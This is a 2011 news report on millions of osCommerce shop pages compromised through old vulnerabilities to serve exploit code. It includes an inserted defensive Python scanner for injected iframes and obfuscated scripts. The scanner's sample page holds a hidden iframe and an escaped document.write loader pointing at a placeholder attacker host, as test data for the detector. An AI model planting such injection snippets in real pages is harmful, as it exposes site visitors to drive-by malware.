In association with heise online

03 August 2011, 09:08

Millions of osCommerce stores hacked


Armorize reports that unknown attackers have compromised numerous online stores running an outdated version of osCommerce in order to plant malicious code. The attackers reportedly exploited at least three known vulnerabilities in version 2.2 of the open source shop system to gain access to the stores' configuration interfaces. This allowed them to inject first an iframe and then JavaScript into the shop pages, which in turn served exploit code to store visitors.
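As an added example, not code from the article or from Armorize or the osCommerce project: a small Python scanner of the kind a store operator could run over saved copies of catalogue pages to surface injections like the ones described, that is, hidden or zero-size iframes pointing off-site and inline scripts that unpack themselves at runtime. The heuristics, the trusted-host list and the sample page (with placeholder hostnames) are all assumptions constructed for the demonstration, not signatures from the actual campaign.

```python
import re
from html.parser import HTMLParser


class InjectionScanner(HTMLParser):
    """Flag iframes and scripts that look injected rather than part of the shop.

    Heuristics (assumption, not a signature for any real campaign):
      - iframe or script src on a host outside the trusted list
      - iframe hidden via CSS or sized 0/1 pixel
      - inline script that decodes itself (eval/unescape/fromCharCode or long
        escaped byte runs), the usual shape of a drive-by loader
    """

    def __init__(self, trusted_hosts):
        super().__init__()
        self.trusted_hosts = {h.lower() for h in trusted_hosts}
        self.findings = []          # (line, tag, reason)
        self._in_script = False
        self._script_buf = []
        self._script_line = 0

    def handle_starttag(self, tag, attrs):
        attrs = {k: (v or "") for k, v in attrs}
        line, _ = self.getpos()
        if tag == "iframe":
            reasons = []
            host = self._host(attrs.get("src", ""))
            if host and host not in self.trusted_hosts:
                reasons.append(f"external src {host}")
            if self._is_hidden(attrs):
                reasons.append("hidden/zero-size")
            if reasons:
                self.findings.append((line, "iframe", "; ".join(reasons)))
        elif tag == "script":
            if attrs.get("src"):
                host = self._host(attrs["src"])
                if host and host not in self.trusted_hosts:
                    self.findings.append((line, "script", f"external src {host}"))
            else:
                # Inline script: collect the body until </script>.
                self._in_script = True
                self._script_buf = []
                self._script_line = line

    def handle_data(self, data):
        if self._in_script:
            self._script_buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            if self._looks_obfuscated("".join(self._script_buf)):
                self.findings.append((self._script_line, "script", "obfuscated inline body"))

    @staticmethod
    def _host(url):
        # Relative URLs have no host and are treated as same-origin.
        m = re.match(r"^(?:https?:)?//([^/:?#]+)", url.strip(), re.I)
        return m.group(1).lower() if m else None

    @staticmethod
    def _is_hidden(attrs):
        style = attrs.get("style", "").lower().replace(" ", "")
        if "display:none" in style or "visibility:hidden" in style:
            return True
        for dim in ("width", "height"):
            v = attrs.get(dim, "").strip().rstrip("px")
            if v.isdigit() and int(v) <= 1:
                return True
        return False

    @staticmethod
    def _looks_obfuscated(body):
        if re.search(r"\b(eval|unescape|String\.fromCharCode)\s*\(", body):
            return True
        # Twenty or more consecutive %XX or \xXX escapes: a packed payload.
        return bool(re.search(r"(?:%[0-9a-f]{2}){20,}|(?:\\x[0-9a-f]{2}){20,}", body, re.I))


def scan_html(html, trusted_hosts):
    """Return a list of (line, tag, reason) findings for one page."""
    scanner = InjectionScanner(trusted_hosts)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample of a catalogue page (placeholder hostnames): a legitimate
# same-host iframe, a zero-size off-site iframe, and an inline loader that
# document.write()s a further iframe from an escaped string.
SAMPLE_PAGE = """<html><head><title>Shop</title>
<script src="/includes/general.js"></script>
</head><body>
<iframe src="//shop.example/help.html" width="300" height="200"></iframe>
<iframe src="http://bad.example.invalid/in.php" width="0" height="0" style="display:none"></iframe>
<script>document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%62%61%64%2E%65%78%61%6D%70%6C%65%2E%69%6E%76%61%6C%69%64%2F%22%3E'));</script>
<script>var x = 1;</script>
</body></html>"""

if __name__ == "__main__":
    for line, tag, reason in scan_html(SAMPLE_PAGE, ["shop.example"]):
        print(f"line {line}: <{tag}> {reason}")
```

Run it over HTML fetched from the live store rather than over the PHP templates alone: the article describes code placed through the configuration interface, so the injection may only appear in rendered output. Anything flagged deserves a look at the template and database fields it was rendered from, and the trusted-host list should contain only hosts the shop itself is known to embed.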

Armorize said that the number of infected store pages grew dramatically within a very short period: when the issue first became known, a Google search returned about 90,000 hits containing the embedded malware; by last Sunday (31 July), only a week later, the figure had apparently risen to 3.8 million. However, the hits sometimes include several sub-pages of the same store, so the count overstates the number of compromised stores. When The H's associates at heise Security checked on Tuesday afternoon, Google returned 4.5 million infected pages.

The malicious code embedded in the hijacked pages contained a total of five exploits, targeting holes in Java, Adobe Reader, the Windows Help Centre and Internet Explorer to infect visitors' systems. All of these vulnerabilities have long since been patched, but with four different programs targeted, it is quite likely that some visitors will have missed at least one of the patches. The domains used to deliver the malicious code have since been shut down.

Online store operators also seem to miss the occasional patch: talking to heise Security, osCommerce developer Harald Ponce de Leon confirmed that the holes exploited in the attack were closed when osCommerce 2.3 was released in November 2010. Versions 2.3.1 and 3.0.1 of the shop system have since become available for download.

(djwm)
